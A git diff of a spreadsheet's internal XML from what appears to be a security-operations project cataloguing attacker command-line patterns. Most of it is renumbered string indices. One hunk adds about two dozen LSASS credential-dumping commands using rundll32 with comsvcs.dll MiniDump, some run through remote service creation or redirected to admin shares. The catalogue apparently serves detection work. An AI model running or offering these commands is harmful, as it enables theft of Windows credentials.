-        <v>297</v>
+        <v>296</v>
       </c>
       <c r="C180" s="1"/>
       <c r="E180" t="s">
-        <v>236</v>
+        <v>235</v>
       </c>
       <c r="F180" t="s">
-        <v>291</v>
+        <v>290</v>
       </c>
     </row>
     <row r="181" spans="1:6" ht="34">
@@ -4677,14 +4694,14 @@
         <v>21</v>
       </c>
       <c r="B181" s="1" t="s">
-        <v>319</v>
+        <v>318</v>
       </c>
       <c r="C181" s="1"/>
       <c r="E181" t="s">
-        <v>309</v>
+        <v>308</v>
       </c>
       <c r="F181" t="s">
-        <v>321</v>
+        <v>320</v>
       </c>
     </row>
     <row r="182" spans="1:6" ht="34">
@@ -4692,14 +4709,14 @@
         <v>21</v>
       </c>
       <c r="B182" s="1" t="s">
-        <v>348</v>
+        <v>347</v>
       </c>
       <c r="C182" s="1"/>
       <c r="E182" t="s">
-        <v>309</v>
+        <v>308</v>
       </c>
       <c r="F182" t="s">
-        <v>346</v>
+        <v>345</v>
       </c>
     </row>
     <row r="183" spans="1:6" ht="51">
@@ -4707,14 +4724,14 @@
         <v>21</v>
       </c>
       <c r="B183" s="1" t="s">
-        <v>349</v>
+        <v>348</v>
       </c>
       <c r="C183" s="1"/>
       <c r="E183" t="s">
-        <v>309</v>
+        <v>308</v>
       </c>
       <c r="F183" t="s">
-        <v>346</v>
+        <v>345</v>
       </c>
     </row>
     <row r="184" spans="1:6" ht="34">
@@ -4722,51 +4739,51 @@
         <v>21</v>
       </c>
       <c r="B184" s="1" t="s">
-        <v>350</v>
+        <v>349</v>
       </c>
       <c r="C184" s="1"/>
       <c r="E184" t="s">
-        <v>309</v>
+        <v>308</v>
       </c>
       <c r="F184" t="s">
-        <v>346</v>
+        <v>345</v>
       </c>
     </row>
     <row r="185" spans="1:6" ht="17">
       <c r="A185" t="s">
-        <v>331</v>
+        <v>330</v>
       </c>
       <c r="B185" s="1" t="s">
-        <v>329</v>
+        <v>328</v>
       </c>
       <c r="C185" s="1"/>
       <c r="E185" t="s">
-        <v>309</v>
+        <v>308</v>
       </c>
       <c r="F185" t="s">
-        <v>328</v>
+        <v>327</v>
       </c>
     </row>
     <row r="186" spans="1:6" ht="17">
       <c r="A186" t="s">
-        <v>331</v>
+        <v>330</v>
       </c>
       <c r="B186" s="1" t="s">
+        <v>372</v>
+      </c>
+      <c r="C186" s="1" t="s">
         <v>373</v>
       </c>
-      <c r="C186" s="1" t="s">
-        <v>374</v>
-      </c>
       <c r="E186" t="s">
-        <v>377</v>
+        <v>376</v>
       </c>
       <c r="F186" t="s">
-        <v>376</v>
+        <v>375</v>
       </c>
     </row>
     <row r="187" spans="1:6" ht="17">
       <c r="A187" t="s">
-        <v>217</v>
+        <v>216</v>
       </c>
       <c r="B187" s="1" t="s">
         <v>87</v>
@@ -4781,7 +4798,7 @@
     </row>
     <row r="188" spans="1:6" ht="17">
       <c r="A188" t="s">
-        <v>217</v>
+        <v>216</v>
       </c>
       <c r="B188" s="1" t="s">
         <v>87</v>
@@ -4796,83 +4813,83 @@
     </row>
     <row r="189" spans="1:6" ht="34">
       <c r="A189" t="s">
-        <v>217</v>
+        <v>216</v>
       </c>
       <c r="B189" s="1" t="s">
+        <v>211</v>
+      </c>
+      <c r="C189" s="1" t="s">
         <v>212</v>
       </c>
-      <c r="C189" s="1" t="s">
-        <v>213</v>
-      </c>
       <c r="E189" t="s">
-        <v>141</v>
+        <v>140</v>
       </c>
       <c r="F189" t="s">
-        <v>151</v>
+        <v>150</v>
       </c>
     </row>
     <row r="190" spans="1:6" ht="136">
       <c r="A190" t="s">
-        <v>217</v>
+        <v>216</v>
       </c>
       <c r="B190" s="1" t="s">
-        <v>216</v>
+        <v>215</v>
       </c>
       <c r="C190" s="1"/>
       <c r="E190" t="s">
-        <v>226</v>
+        <v>225</v>
       </c>
       <c r="F190" t="s">
-        <v>225</v>
+        <v>224</v>
       </c>
     </row>
     <row r="191" spans="1:6" ht="17">
       <c r="A191" t="s">
-        <v>217</v>
+        <v>216</v>
       </c>
       <c r="B191" s="1" t="s">
+        <v>253</v>
+      </c>
+      <c r="C191" s="1" t="s">
         <v>254</v>
       </c>
-      <c r="C191" s="1" t="s">
-        <v>255</v>
-      </c>
       <c r="E191" t="s">
-        <v>236</v>
+        <v>235</v>
       </c>
       <c r="F191" t="s">
-        <v>235</v>
+        <v>234</v>
       </c>
     </row>
     <row r="192" spans="1:6" ht="119">
       <c r="A192" t="s">
-        <v>217</v>
+        <v>216</v>
       </c>
       <c r="B192" s="1" t="s">
-        <v>320</v>
+        <v>319</v>
       </c>
       <c r="C192" s="1"/>
       <c r="E192" t="s">
-        <v>309</v>
+        <v>308</v>
       </c>
       <c r="F192" t="s">
-        <v>321</v>
+        <v>320</v>
       </c>
     </row>
     <row r="193" spans="1:6" ht="17">
       <c r="A193" t="s">
-        <v>411</v>
+        <v>410</v>
       </c>
       <c r="B193" s="1" t="s">
+        <v>203</v>
+      </c>
+      <c r="C193" s="1" t="s">
         <v>204</v>
       </c>
-      <c r="C193" s="1" t="s">
-        <v>205</v>
-      </c>
       <c r="E193" t="s">
-        <v>141</v>
+        <v>140</v>
       </c>
       <c r="F193" t="s">
-        <v>151</v>
+        <v>150</v>
       </c>
     </row>
     <row r="194" spans="1:6" ht="68">
@@ -4928,77 +4945,77 @@
     </row>
     <row r="197" spans="1:6" ht="17">
       <c r="A197" t="s">
-        <v>306</v>
+        <v>305</v>
       </c>
       <c r="B197" s="1" t="s">
         <v>58</v>
       </c>
       <c r="C197" s="1"/>
       <c r="E197" t="s">
-        <v>309</v>
+        <v>308</v>
       </c>
       <c r="F197" t="s">
-        <v>308</v>
+        <v>307</v>
       </c>
     </row>
     <row r="198" spans="1:6" ht="17">
       <c r="A198" t="s">
-        <v>283</v>
+        <v>282</v>
       </c>
       <c r="B198" s="1" t="s">
-        <v>221</v>
+        <v>220</v>
       </c>
       <c r="C198" s="1"/>
       <c r="E198" t="s">
-        <v>226</v>
+        <v>225</v>
       </c>
       <c r="F198" t="s">
-        <v>225</v>
+        <v>224</v>
       </c>
     </row>
     <row r="199" spans="1:6" ht="323">
       <c r="A199" t="s">
-        <v>283</v>
+        <v>282</v>
       </c>
       <c r="B199" s="1" t="s">
-        <v>326</v>
+        <v>325</v>
       </c>
       <c r="C199" s="1"/>
       <c r="E199" t="s">
-        <v>309</v>
+        <v>308</v>
       </c>
       <c r="F199" t="s">
-        <v>321</v>
+        <v>320</v>
       </c>
     </row>
     <row r="200" spans="1:6" ht="68">
       <c r="A200" t="s">
-        <v>282</v>
+        <v>281</v>
       </c>
       <c r="B200" s="1" t="s">
-        <v>280</v>
+        <v>279</v>
       </c>
       <c r="C200" s="1"/>
       <c r="E200" t="s">
-        <v>236</v>
+        <v>235</v>
       </c>
       <c r="F200" t="s">
-        <v>286</v>
+        <v>285</v>
       </c>
     </row>
     <row r="201" spans="1:6" ht="68">
       <c r="A201" t="s">
-        <v>282</v>
+        <v>281</v>
       </c>
       <c r="B201" s="1" t="s">
-        <v>281</v>
+        <v>280</v>
       </c>
       <c r="C201" s="1"/>
       <c r="E201" t="s">
-        <v>236</v>
+        <v>235</v>
       </c>
       <c r="F201" t="s">
-        <v>286</v>
+        <v>285</v>
       </c>
     </row>
     <row r="202" spans="1:6" ht="51">
@@ -5119,7 +5136,7 @@
         <v>24</v>
       </c>
       <c r="B209" s="1" t="s">
-        <v>133</v>
+        <v>132</v>
       </c>
       <c r="C209" s="1"/>
       <c r="E209" t="s">
@@ -5134,14 +5151,14 @@
         <v>24</v>
       </c>
       <c r="B210" s="1" t="s">
-        <v>241</v>
+        <v>240</v>
       </c>
       <c r="C210" s="1"/>
       <c r="E210" t="s">
-        <v>236</v>
+        <v>235</v>
       </c>
       <c r="F210" t="s">
-        <v>235</v>
+        <v>234</v>
       </c>
     </row>
     <row r="211" spans="1:6" ht="17">
@@ -5149,14 +5166,14 @@
         <v>24</v>
       </c>
       <c r="B211" s="1" t="s">
-        <v>242</v>
+        <v>241</v>
       </c>
       <c r="C211" s="1"/>
       <c r="E211" t="s">
-        <v>236</v>
+        <v>235</v>
       </c>
       <c r="F211" t="s">
-        <v>235</v>
+        <v>234</v>
       </c>
     </row>
     <row r="212" spans="1:6" ht="34">
@@ -5164,16 +5181,16 @@
         <v>24</v>
       </c>
       <c r="B212" s="1" t="s">
+        <v>263</v>
+      </c>
+      <c r="C212" s="1" t="s">
         <v>264</v>
       </c>
-      <c r="C212" s="1" t="s">
-        <v>265</v>
-      </c>
       <c r="E212" t="s">
-        <v>236</v>
+        <v>235</v>
       </c>
       <c r="F212" t="s">
-        <v>235</v>
+        <v>234</v>
       </c>
     </row>
     <row r="213" spans="1:6" ht="17">
@@ -5181,14 +5198,14 @@
         <v>24</v>
       </c>
       <c r="B213" s="1" t="s">
-        <v>284</v>
+        <v>283</v>
       </c>
       <c r="C213" s="1"/>
       <c r="E213" t="s">
-        <v>236</v>
+        <v>235</v>
       </c>
       <c r="F213" t="s">
-        <v>286</v>
+        <v>285</v>
       </c>
     </row>
     <row r="214" spans="1:6" ht="17">
@@ -5196,14 +5213,14 @@
         <v>24</v>
       </c>
       <c r="B214" s="1" t="s">
-        <v>285</v>
+        <v>284</v>
       </c>
       <c r="C214" s="1"/>
       <c r="E214" t="s">
-        <v>236</v>
+        <v>235</v>
       </c>
       <c r="F214" t="s">
-        <v>286</v>
+        <v>285</v>
       </c>
     </row>
     <row r="215" spans="1:6" ht="204">
@@ -5211,14 +5228,14 @@
         <v>24</v>
       </c>
       <c r="B215" s="1" t="s">
-        <v>292</v>
+        <v>291</v>
       </c>
       <c r="C215" s="1"/>
       <c r="E215" t="s">
-        <v>236</v>
+        <v>235</v>
       </c>
       <c r="F215" t="s">
-        <v>291</v>
+        <v>290</v>
       </c>
     </row>
     <row r="216" spans="1:6" ht="17">
@@ -5226,14 +5243,14 @@
         <v>24</v>
       </c>
       <c r="B216" s="1" t="s">
-        <v>385</v>
+        <v>384</v>
       </c>
       <c r="C216" s="1"/>
       <c r="E216" t="s">
+        <v>380</v>
+      </c>
+      <c r="F216" t="s">
         <v>381</v>
-      </c>
-      <c r="F216" t="s">
-        <v>382</v>
       </c>
     </row>
     <row r="217" spans="1:6" ht="17">
@@ -5326,10 +5343,10 @@
         <v>40</v>
       </c>
       <c r="B222" s="1" t="s">
-        <v>118</v>
+        <v>117</v>
       </c>
       <c r="C222" s="1" t="s">
-        <v>122</v>
+        <v>121</v>
       </c>
       <c r="E222" t="s">
         <v>6</v>
@@ -5343,10 +5360,10 @@
         <v>40</v>
       </c>
       <c r="B223" s="1" t="s">
-        <v>119</v>
+        <v>118</v>
       </c>
       <c r="C223" s="1" t="s">
-        <v>122</v>
+        <v>121</v>
       </c>
       <c r="E223" t="s">
         <v>6</v>
@@ -5360,10 +5377,10 @@
         <v>40</v>
       </c>
       <c r="B224" s="1" t="s">
-        <v>120</v>
+        <v>119</v>
       </c>
       <c r="C224" s="1" t="s">
-        <v>122</v>
+        <v>121</v>
       </c>
       <c r="E224" t="s">
         <v>6</v>
@@ -5377,10 +5394,10 @@
         <v>40</v>
       </c>
       <c r="B225" s="1" t="s">
+        <v>120</v>
+      </c>
+      <c r="C225" s="1" t="s">
         <v>121</v>
-      </c>
-      <c r="C225" s="1" t="s">
-        <v>122</v>
       </c>
       <c r="E225" t="s">
         <v>6</v>
@@ -5394,7 +5411,7 @@
         <v>40</v>
       </c>
       <c r="B226" s="1" t="s">
-        <v>137</v>
+        <v>136</v>
       </c>
       <c r="C226" s="1"/>
       <c r="E226" t="s">
@@ -5492,7 +5509,7 @@
         <v>11</v>
       </c>
       <c r="B232" s="1" t="s">
-        <v>134</v>
+        <v>133</v>
       </c>
       <c r="C232" s="1"/>
       <c r="E232" t="s">
@@ -5507,14 +5524,14 @@
         <v>11</v>
       </c>
       <c r="B233" s="1" t="s">
-        <v>307</v>
+        <v>306</v>
       </c>
       <c r="C233" s="1"/>
       <c r="E233" t="s">
-        <v>309</v>
+        <v>308</v>
       </c>
       <c r="F233" t="s">
-        <v>308</v>
+        <v>307</v>
       </c>
     </row>
     <row r="234" spans="1:6" ht="34">
@@ -5522,14 +5539,14 @@
         <v>11</v>
       </c>
       <c r="B234" s="1" t="s">
-        <v>336</v>
+        <v>335</v>
       </c>
       <c r="C234" s="1"/>
       <c r="E234" t="s">
-        <v>309</v>
+        <v>308</v>
       </c>
       <c r="F234" t="s">
-        <v>328</v>
+        <v>327</v>
       </c>
     </row>
     <row r="235" spans="1:6" ht="17">
@@ -5537,14 +5554,14 @@
         <v>11</v>
       </c>
       <c r="B235" s="1" t="s">
-        <v>337</v>
+        <v>336</v>
       </c>
       <c r="C235" s="1"/>
       <c r="E235" t="s">
-        <v>309</v>
+        <v>308</v>
       </c>
       <c r="F235" t="s">
-        <v>338</v>
+        <v>337</v>
       </c>
     </row>
     <row r="236" spans="1:6" ht="17">
@@ -5552,14 +5569,14 @@
         <v>11</v>
       </c>
       <c r="B236" s="1" t="s">
-        <v>340</v>
+        <v>339</v>
       </c>
       <c r="C236" s="1"/>
       <c r="E236" t="s">
-        <v>309</v>
+        <v>308</v>
       </c>
       <c r="F236" t="s">
-        <v>338</v>
+        <v>337</v>
       </c>
     </row>
     <row r="237" spans="1:6" ht="17">
@@ -5567,14 +5584,14 @@
         <v>11</v>
       </c>
       <c r="B237" s="1" t="s">
-        <v>342</v>
+        <v>341</v>
       </c>
       <c r="C237" s="1"/>
       <c r="E237" t="s">
-        <v>309</v>
+        <v>308</v>
       </c>
       <c r="F237" t="s">
-        <v>338</v>
+        <v>337</v>
       </c>
     </row>
     <row r="238" spans="1:6" ht="34">
@@ -5582,14 +5599,14 @@
         <v>11</v>
       </c>
       <c r="B238" s="1" t="s">
-        <v>352</v>
+        <v>351</v>
       </c>
       <c r="C238" s="1"/>
       <c r="E238" t="s">
-        <v>309</v>
+        <v>308</v>
       </c>
       <c r="F238" t="s">
-        <v>346</v>
+        <v>345</v>
       </c>
     </row>
     <row r="239" spans="1:6" ht="17">
@@ -5597,36 +5614,37 @@
         <v>11</v>
       </c>
       <c r="B239" s="1" t="s">
-        <v>384</v>
+        <v>383</v>
       </c>
       <c r="C239" s="1"/>
       <c r="E239" t="s">
+        <v>380</v>
+      </c>
+      <c r="F239" t="s">
         <v>381</v>
-      </c>
-      <c r="F239" t="s">
-        <v>382</v>
       </c>
     </row>
     <row r="240" spans="1:6" ht="51">
       <c r="A240" t="s">
+        <v>276</v>
+      </c>
+      <c r="B240" s="1" t="s">
+        <v>275</v>
+      </c>
+      <c r="C240" s="1" t="s">
         <v>277</v>
       </c>
-      <c r="B240" s="1" t="s">
-        <v>276</v>
-      </c>
-      <c r="C240" s="1" t="s">
-        <v>278</v>
-      </c>
       <c r="E240" t="s">
-        <v>236</v>
+        <v>235</v>
       </c>
       <c r="F240" t="s">
-        <v>274</v>
+        <v>273</v>
       </c>
     </row>
   </sheetData>
   <phoneticPr fontId="1" type="noConversion"/>
   <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
+  <pageSetup orientation="portrait" horizontalDpi="0" verticalDpi="0"/>
   <tableParts count="1">
     <tablePart r:id="rId1"/>
   </tableParts>

--- a/docs/TIP-CommandLine.xlsx
+++ b/docs/TIP-CommandLine.xlsx
@@ -8,9 +8,9 @@
       <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="/Users/harveywargo/Desktop/GithubProjects/SOC-Puppet/docs/"/>
     </mc:Choice>
   </mc:AlternateContent>
-  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{FC3F9FBD-DE53-BA47-B6D0-CAD44824324A}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
+  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{9916E47E-292C-844A-8724-CC4F48C575F0}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
   <bookViews>
-    <workbookView xWindow="80" yWindow="-21100" windowWidth="38400" windowHeight="21100" xr2:uid="{A9D12C86-CCAB-E94D-B7F0-B816A83AE7B1}"/>
+    <workbookView xWindow="0" yWindow="-21100" windowWidth="38400" windowHeight="21100" xr2:uid="{A9D12C86-CCAB-E94D-B7F0-B816A83AE7B1}"/>
   </bookViews>
   <sheets>
     <sheet name="Sheet1" sheetId="1" r:id="rId1"/>
@@ -1821,8 +1821,8 @@
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="x14ac xr xr2 xr3" xr:uid="{777F7044-177D-E446-92F0-ACF0229F6F68}">
   <dimension ref="A1:F240"/>
   <sheetViews>
-    <sheetView tabSelected="1" topLeftCell="A73" workbookViewId="0">
-      <selection activeCell="B101" sqref="B88:B101"/>
+    <sheetView tabSelected="1" topLeftCell="A161" workbookViewId="0">
+      <selection activeCell="B168" sqref="B168"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr baseColWidth="10" defaultRowHeight="16"/>

--- a/docs/TIP-CommandLine.xlsx
+++ b/docs/TIP-CommandLine.xlsx
@@ -8,7 +8,7 @@
       <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="/Users/harveywargo/Desktop/GithubProjects/SOC-Puppet/docs/"/>
     </mc:Choice>
   </mc:AlternateContent>
-  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{9916E47E-292C-844A-8724-CC4F48C575F0}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
+  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{25A943D0-2DC7-BE41-AE9E-3D82CFB153F7}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
   <bookViews>
     <workbookView xWindow="0" yWindow="-21100" windowWidth="38400" windowHeight="21100" xr2:uid="{A9D12C86-CCAB-E94D-B7F0-B816A83AE7B1}"/>
   </bookViews>
@@ -36,7 +36,7 @@
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1063" uniqueCount="417">
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1132" uniqueCount="441">
   <si>
     <t>Pattern</t>
   </si>
@@ -1397,6 +1397,78 @@
   </si>
   <si>
     <t>NETSH_P0002</t>
+  </si>
+  <si>
+    <t>"C:\Windows\system32\sc.exe" \\server create Dump binpath= "C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll,MiniDump &lt;PID&gt; C:\dump.bin full"</t>
+  </si>
+  <si>
+    <t>"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -c rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump &lt;PID&gt; C:\Users\username\Desktop\&lt;filename&gt;.DMP full</t>
+  </si>
+  <si>
+    <t>"Powershell" -c "rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump &lt;PID&gt;get-process lsass).id C:\Users\username\AppData\Local\Temp\&lt;filename&gt;.dmp full"</t>
+  </si>
+  <si>
+    <t>C:\Windows\system32\cmd.exe /c "echo string &gt;NUL &amp; powershell -ExecutionPolicy bypass -Command "$a = (Get-Process lsass).id; rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump &lt;PID&gt;a C:\Windows\TEMP\string\string\&lt;filename&gt;.dmp full" &amp; exit"</t>
+  </si>
+  <si>
+    <t>C:\Windows\system32\cmd.exe /Q /c echo .\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump &lt;PID&gt; C:\Users\Administrator\&lt;filename&gt;.dmp full ^&gt; \\127.0.0.1\C$\__output 2^&gt;^&amp;1 &gt; C:\Windows\TEMP\execute.bat &amp; C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\execute.bat &amp; del C:\Windows\TEMP\execute.bat</t>
+  </si>
+  <si>
+    <t>C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.EXE "rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump &lt;PID&gt;get-process lsass).id) C:\Windows\lsass_$(Get-Date -Format dd-MM-hh-mm-ss&lt;filename&gt;dmp full"</t>
+  </si>
+  <si>
+    <t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoP -C C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump &lt;PID&gt;Get-Process lsass).Id \Windows\Temp\&lt;filename&gt;.dmp full;Wait-Process -Id (Get-Process rundll32).id</t>
+  </si>
+  <si>
+    <t>cmd /C "rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump &lt;PID&gt; \\ipv4\pwn\&lt;filename&gt;.dmp full"</t>
+  </si>
+  <si>
+    <t>cmd.exe /Q /c for /f "tokens=1,2 delims= " ^%A in ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump &lt;PID&gt; \Windows\Temp\&lt;filename&gt;.dmp full</t>
+  </si>
+  <si>
+    <t>cmd.exe /C cmd.exe /Q /c for /f "tokens=1,2 delims= " ^%A in ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump &lt;PID&gt; \Windows\Temp\&lt;filename&gt;.dmp full</t>
+  </si>
+  <si>
+    <t>cmd.exe /C powershell.exe -NoP -C "C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump &lt;PID&gt;Get-Process lsass).Id \Windows\Temp\&lt;filename&gt;.dmp full;Wait-Process -Id (Get-Process rundll32).id"</t>
+  </si>
+  <si>
+    <t>cmd.exe /Q /c powershell -noni -nop "rundll32.exe comsvcs.dll,minidump &lt;PID&gt; c:\windows\temp\test.log full" 1&gt; \\127.0.0.1\ADMIN$\__1111111.1111111 2&gt;&amp;1</t>
+  </si>
+  <si>
+    <t>cmd.exe /Q /c rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump &lt;PID&gt; C:\&lt;filename&gt;.dmp full 1&gt; \\127.0.0.1\ADMIN$\__1111111.1111111 2&gt;&amp;1</t>
+  </si>
+  <si>
+    <t>powershell.exe -ExecutionPolicy Bypass -C "C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump &lt;PID&gt;Get-Process lsass).id $env:TEMP\lsass-&lt;filename&gt;.dmp full"</t>
+  </si>
+  <si>
+    <t>cmd.exe /Q /c sc create DumpProc binpath= "rundll32 comsvcs,#24 1204 c:\windows\tmp1654.log full" 1&gt; \\127.0.0.1\ADMIN$\__1622704760.494238 2&gt;&amp;1</t>
+  </si>
+  <si>
+    <t>"C:\Windows\System32\rundll32.exe"  C:\Windows\System32\comsvcs.dll MiniDump &lt;PID&gt; \Windows\Temp\&lt;filename&gt;.dmp full</t>
+  </si>
+  <si>
+    <t xml:space="preserve">.\rundll32.exe  C:\windows\System32\comsvcs.dll, MiniDump &lt;PID&gt; C:\Users\Administrator\&lt;filename&gt;.dmp full   </t>
+  </si>
+  <si>
+    <t xml:space="preserve">"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" &amp; {C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump &lt;PID&gt;Get-Process lsass).id $env:TEMP\lsass-&lt;filename&gt;.dmp full} </t>
+  </si>
+  <si>
+    <t>cmd.exe  /Q /c for /f "tokens=1,2 delims= " %A in ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump &lt;PID&gt; \Windows\Temp\&lt;filename&gt;.dmp full</t>
+  </si>
+  <si>
+    <t>powershell  -ExecutionPolicy bypass -Command "$a = (Get-Process lsass).id; rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump &lt;PID&gt;a C:\temp\blabla"</t>
+  </si>
+  <si>
+    <t xml:space="preserve">powershell  -noni -nop "rundll32.exe comsvcs.dll,minidump &lt;PID&gt; c:\windows\temp\test.log full" </t>
+  </si>
+  <si>
+    <t>rundll32.exe  comsvcs.dll,#24 600 C:\Users\user\Desktop\lsass.dmp full</t>
+  </si>
+  <si>
+    <t>sc  create DumpProc binpath= "rundll32 comsvcs,#24 1204 c:\windows\tmp.log full"</t>
+  </si>
+  <si>
+    <t>https://gist.github.com/JohnLaTwC/3e7dd4cd8520467df179e93fb44a434e</t>
   </si>
 </sst>
 </file>
@@ -1471,15 +1543,16 @@
   <cellStyleXfs count="1">
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0"/>
   </cellStyleXfs>
-  <cellXfs count="6">
+  <cellXfs count="7">
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
       <alignment wrapText="1"/>
     </xf>
     <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="0" applyFont="1"/>
-    <xf numFmtId="0" fontId="3" fillId="2" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1"/>
     <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyBorder="1"/>
     <xf numFmtId="0" fontId="3" fillId="2" borderId="0" xfId="0" applyFont="1" applyFill="1"/>
+    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyBorder="1"/>
+    <xf numFmtId="0" fontId="3" fillId="2" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1"/>
   </cellXfs>
   <cellStyles count="1">
     <cellStyle name="Normal" xfId="0" builtinId="0"/>
@@ -1505,10 +1578,10 @@
 </file>
 
 <file path=xl/tables/table1.xml><?xml version="1.0" encoding="utf-8"?>
-<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="xr xr3" id="1" xr:uid="{485C79FA-D6D5-EA48-96EB-664E304004D9}" name="Table1" displayName="Table1" ref="A1:F240" totalsRowShown="0">
-  <autoFilter ref="A1:F240" xr:uid="{485C79FA-D6D5-EA48-96EB-664E304004D9}"/>
-  <sortState xmlns:xlrd2="http://schemas.microsoft.com/office/spreadsheetml/2017/richdata2" ref="A2:F240">
-    <sortCondition ref="A1:A240"/>
+<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="xr xr3" id="1" xr:uid="{485C79FA-D6D5-EA48-96EB-664E304004D9}" name="Table1" displayName="Table1" ref="A1:F263" totalsRowShown="0">
+  <autoFilter ref="A1:F263" xr:uid="{485C79FA-D6D5-EA48-96EB-664E304004D9}"/>
+  <sortState xmlns:xlrd2="http://schemas.microsoft.com/office/spreadsheetml/2017/richdata2" ref="A2:F263">
+    <sortCondition ref="A1:A263"/>
   </sortState>
   <tableColumns count="6">
     <tableColumn id="1" xr3:uid="{CC8E4D7C-9AD6-AF4E-AAE8-17CAF7B0ED19}" name="PID"/>
@@ -1819,16 +1892,17 @@
 
 <file path=xl/worksheets/sheet1.xml><?xml version="1.0" encoding="utf-8"?>
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="x14ac xr xr2 xr3" xr:uid="{777F7044-177D-E446-92F0-ACF0229F6F68}">
-  <dimension ref="A1:F240"/>
+  <dimension ref="A1:F263"/>
   <sheetViews>
-    <sheetView tabSelected="1" topLeftCell="A161" workbookViewId="0">
-      <selection activeCell="B168" sqref="B168"/>
+    <sheetView tabSelected="1" workbookViewId="0">
+      <selection activeCell="B10" sqref="B10"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr baseColWidth="10" defaultRowHeight="16"/>
   <cols>
     <col min="1" max="1" width="13.33203125" bestFit="1" customWidth="1"/>
-    <col min="2" max="3" width="100.83203125" customWidth="1"/>
+    <col min="2" max="2" width="120" customWidth="1"/>
+    <col min="3" max="3" width="90.5" customWidth="1"/>
     <col min="4" max="5" width="18.1640625" customWidth="1"/>
     <col min="6" max="6" width="116.33203125" bestFit="1" customWidth="1"/>
     <col min="7" max="7" width="148.1640625" customWidth="1"/>
@@ -2358,426 +2432,333 @@
         <v>345</v>
       </c>
     </row>
-    <row r="34" spans="1:6" ht="17">
